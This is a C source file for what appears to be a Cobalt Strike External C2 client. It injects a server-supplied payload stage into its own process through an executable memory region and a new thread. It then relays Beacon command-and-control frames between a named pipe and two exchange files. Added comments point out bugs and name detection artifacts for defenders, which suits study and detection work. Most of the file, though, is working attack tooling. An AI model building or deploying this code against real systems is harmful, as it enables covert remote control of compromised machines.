c2file.c
/* a quick-client for Cobalt Strike's External C2 server mostly code from @armitagehacker */
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <sys/stat.h>
#define PAYLOAD_MAX_SIZE 512 * 1024
#define BUFFER_MAX_SIZE 1024 * 1024
/* read a frame from a handle */
/*
 * read_frame: read one length-prefixed frame from my_handle into buffer.
 * Frame layout (matches write_frame below): a 4-byte length in host byte
 * order, followed by that many payload bytes.  Returns the length field
 * exactly as it was read from the handle.
 *
 * Review notes on this block as written:
 *  - `max` is never consulted: `size` comes straight off the handle and is
 *    used as the write bound for `buffer`, so a length larger than the
 *    caller's buffer overruns it.
 *  - Neither ReadFile call's return value is checked.  If a read fails or
 *    delivers 0 bytes, `total` stops advancing and the loop never exits,
 *    sleeping 3 s per pass (presumably `temp` is 0 in that case — confirm
 *    against the ReadFile contract).
 */
DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) {
DWORD size = 0, temp = 0, total = 0;
/* read the 4-byte length */
ReadFile(my_handle, (char * ) & size, 4, & temp, NULL);
/* read the whole thing in */
while (total < size) {
Sleep(3000); /* fixed 3 s pause before every chunk read */
ReadFile(my_handle, buffer + total, size - total, & temp, NULL);
total += temp;
}
return size;
}
/* write a frame to a file */
/*
 * write_frame: write one length-prefixed frame to my_handle — the 4-byte
 * `length` (host byte order) followed by `length` bytes from `buffer`.
 * This is the inverse of read_frame above.
 *
 * Review note: both WriteFile results are ignored and `wrote` is never
 * compared with the requested size, so a failed or short write goes
 * unnoticed by the caller.
 */
void write_frame(HANDLE my_handle, char * buffer, DWORD length) {
DWORD wrote = 0;
WriteFile(my_handle, (void * ) & length, 4, & wrote, NULL);
WriteFile(my_handle, buffer, length, & wrote, NULL);
}
/*
 * start_beacon: copy `length` bytes of `payload` into a freshly allocated
 * RWX region of this process, start a thread whose entry point is the
 * first byte of that region, then open the named pipe \\.\pipe\foobar and
 * return its handle.
 *
 * Defender notes: VirtualAlloc(PAGE_EXECUTE_READWRITE) -> memcpy ->
 * CreateThread with a start address inside a private, non-image-backed
 * region is a classic self-injection sequence, and the hard-coded pipe
 * name is a direct host artifact.  Both are high-signal telemetry
 * (memory-allocation, thread-creation and named-pipe events) for
 * EDR/ETW-based detection.
 *
 * Review notes on this block as written:
 *  - the VirtualAlloc result is not checked, so on failure memcpy writes
 *    through a NULL pointer;
 *  - the CreateThread handle is discarded (leaked);
 *  - the CreateFileA loop has no delay, so it busy-spins until the pipe
 *    exists, and it does not distinguish "pipe not yet created" from any
 *    other failure;
 *  - `%d` is used to print a DWORD (an unsigned long); `%lu` is the
 *    matching specifier.
 */
HANDLE start_beacon(char * payload, DWORD length){
/* inject the payload stage into the current process */
char * payloadE = VirtualAlloc(0, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(payloadE, payload, length);
printf("Injecting Code, %d bytes\n", length);
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) payloadE, (LPVOID) NULL, 0, NULL);
/*
 * connect to our Beacon named pipe */
HANDLE handle_beacon = INVALID_HANDLE_VALUE;
while (handle_beacon == INVALID_HANDLE_VALUE) {
handle_beacon = CreateFileA("\\\\.\\pipe\\foobar",
GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS, NULL);
}
return(handle_beacon);
}
/*
 * put_file: overwrite the file named `fout` with `length` bytes of `data`.
 * "wb" truncates on open, so a call with length 0 empties the file — that
 * is how go() below clears the exchange files.
 *
 * Review note: fopen's result is not checked, so if the file cannot be
 * opened (permissions, missing directory, locked by another process)
 * fwrite and fclose are called on a NULL FILE*.  The fwrite and fclose
 * results are also ignored, so a short or failed write is silent.
 */
void put_file(char *fout,char *data, DWORD length){
FILE *fo;
fo = fopen(fout,"wb");
fwrite(data, length, 1, fo);
fclose(fo);
}
/*
 * pop_file: read the entire contents of the file named `fin` into `data`.
 * Returns the number of bytes read, or -1 if the file cannot be opened or
 * its size is not strictly below `max` (the `fileLen+1 > max` test rejects
 * a file of exactly `max` bytes as well as larger ones).
 *
 * Review notes on this block as written:
 *  - ftell returns -1 on error; stored into the unsigned `fileLen` that
 *    becomes a very large value, which the `max` check then rejects — so
 *    the error path is reached by accident rather than by design;
 *  - the fread result is ignored, so a short read returns `fileLen` even
 *    though fewer bytes were placed in `data`;
 *  - the return type is int while `fileLen` is unsigned long; values
 *    above INT_MAX would be truncated (only reachable if `max` allows it).
 */
int pop_file(char *fin,char *data, DWORD max){
FILE *fi;
unsigned long fileLen;
fi = fopen(fin, "rb");
if (!fi){
fprintf(stderr, "Unable to open file %s\n", fin);
return(-1);
}
/* determine the size by seeking to the end and reading back the offset */
fseek(fi, 0, SEEK_END);
fileLen=ftell(fi);
fseek(fi, 0, SEEK_SET);
if(fileLen+1 > max){
fprintf(stderr, "Memory error!");
fclose(fi);
return(-1);
}
fread(data, fileLen, 1, fi);
fclose(fi);
return(fileLen);
}
/*
 * fsize: return the size in bytes of the file at `filename` via stat(),
 * or -1 if stat() fails (e.g. the file does not exist).  go() below treats
 * any value <= 0 as "nothing waiting", so a stat failure and an empty file
 * are indistinguishable to the caller.
 */
off_t fsize(const char *filename) {
struct stat st;
if (stat(filename, &st) == 0)
return st.st_size;
return -1;
}
/* the main logic for our client */
/*
 * go: file-based relay between a Beacon running in this process and an
 * External C2 server.  Two files in the working directory carry the
 * traffic: "<name>.bea" (client -> server) and "<name>.beb" (server ->
 * client).  The sequence is:
 *   1. write "go" to <name>.bea to request a stage;
 *   2. poll <name>.beb every 2 s until it is non-empty, wait a further
 *      10 s, read it as the stage and then truncate it;
 *   3. start_beacon() injects the stage and opens the Beacon pipe;
 *   4. loop forever: read a frame from the pipe, write it to <name>.bea if
 *      it is longer than 1 byte, and if <name>.beb is non-empty read it,
 *      truncate it and write its contents to the pipe as a frame.
 *
 * Defender notes: the fixed file names, the fixed 2 s / 10 s / 300 ms
 * sleeps and the repeated create-truncate cycle on the same two files are
 * host artifacts visible to file-system auditing, independent of any
 * network telemetry.
 *
 * Review notes on this block as written:
 *  - `sprintf` writes "<name>.bea"/"<name>.beb" into 128-byte stack
 *    buffers with no bound; `name` comes from argv, so a long argument
 *    overflows `fout`/`fin`;
 *  - `read` is a DWORD, so `read < 0` can never be true and a failed
 *    read_frame is not detected here;
 *  - pop_file's -1 error return is passed to start_beacon as a DWORD,
 *    which then asks VirtualAlloc for 0xFFFFFFFF bytes;
 *  - when <name>.beb is empty, `read` and `buffer` still hold the frame
 *    just read from the pipe, so that frame appears to be written back to
 *    the Beacon — this does not look intentional, confirm against the
 *    server side;
 *  - neither malloc result is checked, and neither buffer is freed.
 */
void go(char * name) {
/* xychix ask server for stage */
/* xychix prepare stage for sending */
/*
 * connect to the External C2 server */
char fout[128];
char fin[128];
int len;
sprintf(fout, "%s.bea", name);
sprintf(fin, "%s.beb", name);
put_file(fout,"go",2);
/* wait until the server has written something into <name>.beb */
while( fsize(fin) <= 0 ){
Sleep( 2000 );
}
Sleep( 10000 );
char * srvpayload = malloc(PAYLOAD_MAX_SIZE);
int srvpayloadLen = pop_file(fin,srvpayload,PAYLOAD_MAX_SIZE-1);
/* empty <name>.beb so the stage is not read a second time */
put_file(fin,"",0);
HANDLE handle_beacon = start_beacon(srvpayload, srvpayloadLen);
/* setup our buffer */
char * buffer = (char * ) malloc(BUFFER_MAX_SIZE);
/*
 * relay frames back and forth */
while (TRUE) {
/* read from our named pipe Beacon */
DWORD read = read_frame(handle_beacon, buffer,BUFFER_MAX_SIZE);
if (read < 0) {
break;
}else{
printf("got %d bytes from pipe\n",read);
}
/* write to the External C2 server */
//send_frame(socket_extc2, buffer, read);
if(read > 1) {
printf("writing %d bytes\n",read);
put_file(fout,buffer,read);
}
/* read from the External C2 server */
int size_beb = fsize(fin);
if( size_beb > 0){
printf("%d bytes waiting\n",size_beb);
read = pop_file(fin, buffer, BUFFER_MAX_SIZE);
if (read < 0) {
break;
}else{
/* truncate <name>.beb now that its contents are in `buffer` */
put_file(fin,"",0);
}
}
/* write to our named pipe Beacon */
write_frame(handle_beacon, buffer, read);
Sleep(300);
}
/* close our handles */
CloseHandle(handle_beacon);
}
/*
 * Entry point: expects exactly one argument, the base name used for the
 * two exchange files (see go()).
 *
 * Review notes: `void main(DWORD argc, ...)` is not a standard signature
 * (`int main(int argc, char *argv[])` is).  WSAStartup is called but
 * nothing in this file uses a socket (the send_frame call in go() is
 * commented out), its return value is not checked, and there is no
 * matching WSACleanup.
 */
void main(DWORD argc, char * argv[]) {
/* check our arguments */
if (argc != 2) {
printf("%s [name]\n", argv[0]);
exit(1);
}
/* initialize winsock */
WSADATA wsaData;
WORD wVersionRequested;
wVersionRequested = MAKEWORD(2, 2);
WSAStartup(wVersionRequested, & wsaData);
/* start our client */
go(argv[1]);
}